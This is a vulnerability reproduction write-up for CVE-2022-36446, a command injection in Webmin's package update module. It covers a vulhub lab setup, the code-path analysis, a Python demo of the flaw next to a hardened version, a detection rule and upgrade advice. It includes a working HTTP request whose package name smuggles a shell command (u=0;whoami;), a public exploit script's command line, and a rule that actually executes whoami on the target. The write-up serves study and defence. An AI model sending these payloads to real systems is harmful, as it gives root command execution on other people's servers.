0x01 Vulnerability Introduction
Vulnerability Level: Critical
Webmin is a widely used web-based Unix system administration tool. The administrator reaches its management modules through a browser and performs administrative actions from there. Webmin before version 1.997 contains a command injection vulnerability in the Software Package Updates module; triggering it requires being logged in to Webmin.
0x02 Vulnerability scope
Webmin versions before 1.997
0x03 Exploit conditions
- The vulnerability requires authentication;
- The authenticated account must have access to the "Software Package Updates" module, because that module is where the vulnerable code path is reached.
0x04 Vulnerability Reproduction
Environment build
1. Use vulhub to build the environment: clone vulhub to the local machine.
2. Enter vulhub/webmin/CVE-2019-15107; the Webmin shipped in that environment is older than 1.997, so it is also used here to reproduce CVE-2022-36446.
docker-compose up -d # start the vulnerable environment
docker-compose ps # show the ports the environment maps
3. Browse to https://ip:10000. If the Webmin login page appears, the environment has been deployed successfully.
4. Next, set the Webmin root password; this has to be done inside the container.
docker ps # find the container id of the vulnerable environment
docker exec -it <container-id> /bin/bash # enter the container
cd /usr/share/webmin/ # Webmin's install directory inside the container
./changepass.pl /etc/webmin root root # set the root password to root
Vulnerability reproduction
1. After the setup above, log in to Webmin as root/root.
2. Capture any request made after login (for example with Burp Suite).
3. Send it to the Repeater module and change the request method to POST.
4. Change the request path to /package-updates/update.cgi, add the payload below, and send the request; the command output is returned in the response. The package name u=0;whoami; (URL-encoded as 0%3Bwhoami%3B) closes the package manager's install command and appends the injected command, and the confirm parameter only needs to be present.
mode=new&search=ssh&redir=&redirdesc=&u=0%3Bwhoami%3B&confirm=Install%2BNow
POST /package-updates/update.cgi HTTP/1.1
Host: X.X.X.X:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-From: mount
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://X.X.X.X:10000/mount/?xnavigation=1
Cookie: redirect=1; testing=1; sid=75eb9d34c1642057244dc271fb980bf6
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

mode=new&search=ssh&redir=&redirdesc=&u=0%3Bid%3B&confirm=Install%2BNow
EXP
The vulnerability can also be exploited directly with a script. EXP address: https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE
python3 CVE-2022-36446.py -t https://X.X.X.X:10000/ -u root -p root -k -I
The script may fail with a BeautifulSoup parser error when the lxml parser is not installed. In that case either install it (pip install lxml) or change every occurrence of
soup = BeautifulSoup(r.content, 'lxml')
in CVE-2022-36446.py to
soup = BeautifulSoup(r.content, 'html.parser')
and run the script again.
Vulnerability analysis
Command execution:
When an application needs to call an external program, it uses a function that executes system commands, such as system, exec or shell_exec in PHP. If the user controls part of the argument to such a function, malicious system commands can be injected into the normal command, which is a command execution attack.
Webmin is a web-based Unix system administration tool whose management modules are driven from a browser. To update and install packages it invokes the operating system's package manager (apt, yum, and so on). Because the package name is not sanitized (the CVE entry describes it as software/apt-lib.pl in Webmin before 1.997 lacking escaping for a UI command), arbitrary commands can be appended to the package manager call.
The vulnerability requires authentication, and the account must have access to the package update module. Such a user can execute system commands, with root privileges, while installing a new package.
The module lives under the /package-updates/ folder. In update.cgi, line 39 reads the user-supplied package name from the u parameter, and line 50 checks whether the request contains a confirm parameter. On line 57, if confirm is absent, list_package_operations() is called with the pkgnames variable, which holds the package names.
Line 4 of /package-updates/update.cgi shows that list_package_operations() comes from package-updates-lib.pl, where it is defined on line 408. On line 412 this function passes $name, the package name, to update_system_operations() in the software module.
Searching for update_system_operations() finds it defined in both apt-lib.pl and yum-lib.pl. As the names suggest, apt-lib.pl drives apt and yum-lib.pl drives yum. Both do the same job; only some of the commands differ, depending on which package manager the system running Webmin uses, so either file can be analyzed.
In /software/apt-lib.pl, update_system_operations() is defined on line 75. Line 83 runs the system command through backquote_command(), and that path also checks what it runs, so a user cannot inject commands here.
Back in update.cgi, if a package is to be installed, package_install() is called on line 129. package_install() is defined at line 300 of package-updates-lib.pl; on line 345 it calls update_system_install() with the $name variable, the package name supplied by the user (as established above, this function is defined in apt-lib.pl).
In apt-lib.pl, line 18 assigns the function's first argument (the package name the user sent) to the update variable. On line 26 that variable is interpolated into the command string without any check, and on line 46 the resulting command is executed on the system, again without any check.
So a user who supplies the confirm parameter in a new-package install request and places shell metacharacters in the package name can execute commands on the system with root privileges.
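The bug class in apt-lib.pl, a user-controlled name concatenated into a shell string, is easy to see in miniature. The following is an added example in Python, not Webmin's Perl code: install_vulnerable() mirrors the line-26 concatenation followed by a shell, install_argv_only() shows that passing the name as a single argv element without a shell already defeats the ";" injection, and install_hardened() adds a package-name check so that option injection (a name beginning with "-") and other malformed input never reach the package manager at all. So that it runs offline, echo stands in for apt-get; that substitution is an assumption of the example.

```python
"""Added example, not Webmin's code: the apt-lib.pl bug class reproduced in
Python beside its hardened form. `echo` stands in for apt-get so the example
runs offline (assumption of this example).
"""
import re
import subprocess

PKG_MANAGER = ["echo", "apt-get", "-y", "install"]  # "echo" stands in for apt-get

# Debian package-name grammar: lowercase letters, digits, "+", "-", ".", at
# least two characters, starting with a letter or digit. An optional "=version"
# pin is accepted with its own restricted character set.
_PKG_NAME = re.compile(r"^[a-z0-9][a-z0-9+.-]+$")
_PKG_VERSION = re.compile(r"^[A-Za-z0-9.+:~-]+$")


def install_vulnerable(pkg: str) -> str:
    """apt-lib.pl line 26 style: string concatenation, then /bin/sh runs it."""
    cmd = " ".join(PKG_MANAGER) + " " + pkg
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def install_argv_only(pkg: str) -> str:
    """No shell: `pkg` is one argv element, so ";" is just another character."""
    return subprocess.run(PKG_MANAGER + [pkg], capture_output=True, text=True).stdout


def is_safe_pkg(pkg: str) -> bool:
    """True if `pkg` is a well-formed name or name=version."""
    name, sep, version = pkg.partition("=")
    if not _PKG_NAME.match(name):
        return False
    return not sep or bool(_PKG_VERSION.match(version))


def install_hardened(pkg: str) -> str:
    """Validate first, then argv without a shell: defence in depth."""
    if not is_safe_pkg(pkg):
        raise ValueError(f"rejected package name: {pkg!r}")
    return install_argv_only(pkg)


if __name__ == "__main__":
    payload = "0;echo INJECTED;"  # same shape as u=0%3Bwhoami%3B on the page
    print("vulnerable:", repr(install_vulnerable(payload)))
    print("argv only :", repr(install_argv_only(payload)))
    print("hardened  :", is_safe_pkg(payload), is_safe_pkg("openssh-server=1:9.2p1-2"))
```

In the vulnerable variant the stand-in package manager prints "apt-get -y install 0" and the shell then runs the second command; in the argv variant the whole payload is printed as one literal argument. The validator is the part Webmin's fix needed: apt-get itself would reject "0;whoami;" as a package name, but only after the shell had already executed it.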
0x05 Detection POC rule writing
params:
  - mode=new&search=ssh&redir=&redirdesc=&u=0%3Bwhoami%3B&confirm=Install%2BNow
name: Webmin command execution vulnerability (CVE-2022-36446)
set: {}
rules:
  - method: POST
    path: /package-updates/update.cgi
    headers:
      Cookie: redirect=1; testing=1; sid=75eb9d34c1642057244dc271fb980bf6
    body: mode=new&search=ssh&redir=&redirdesc=&u=0%3Bwhoami%3B&confirm=Install%2BNow
    search: ""
    followredirects: false
    expression: response.status == 200 && response.body.bcontains(b"root")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""
The sid cookie in the rule is the session obtained by logging in as a user who can reach Software Package Updates; substitute a live session before running it. Note that the rule is not passive: it really executes whoami on the target, which is why the response is expected to contain root.
0x06 Fix
1. Upgrade to Webmin 1.997 or later.
2. Patch acquisition: obtain and apply the upstream patch if upgrading is not immediately possible.